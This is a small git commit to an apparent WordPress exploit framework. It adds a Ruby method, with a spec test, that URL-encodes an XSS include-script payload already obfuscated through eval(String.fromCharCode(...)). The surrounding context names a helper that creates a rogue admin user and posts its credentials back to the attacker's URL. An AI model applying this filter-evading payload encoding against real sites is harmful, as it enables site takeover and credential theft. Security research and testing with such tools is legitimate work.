Add #xss_url_and_ascii_encoded_include_script

rastating · rastating · commit e0fd09b5853f · 2017-03-13T01:20:20.000Z
diff --git a/lib/wpxf/wordpress/xss.rb b/lib/wpxf/wordpress/xss.rb
@@ -65,6 +65,11 @@ def xss_ascii_encoded_include_script
     "eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
   end
 
+  # @return [String] the URL encoded value of #xss_ascii_encoded_include_script.
+  def xss_url_and_ascii_encoded_include_script
+    url_encode(xss_ascii_encoded_include_script)
+  end
+
   # @return [String] a script that will create a new admin user and post the
   #   credentials back to {#xss_url}.
   def wordpress_js_create_user
diff --git a/spec/wordpress/xss_spec.rb b/spec/wordpress/xss_spec.rb
@@ -67,4 +67,10 @@
       expect(subject.xss_ascii_encoded_include_script).to eq encoded
     end
   end
+
+  describe '#xss_url_and_ascii_encoded_include_script' do
+    it 'returns a URL encoded version of #xss_ascii_encoded_include_script' do
+      expect(subject.xss_url_and_ascii_encoded_include_script).to eq url_encode(subject.xss_ascii_encoded_include_script)
+    end
+  end
 end
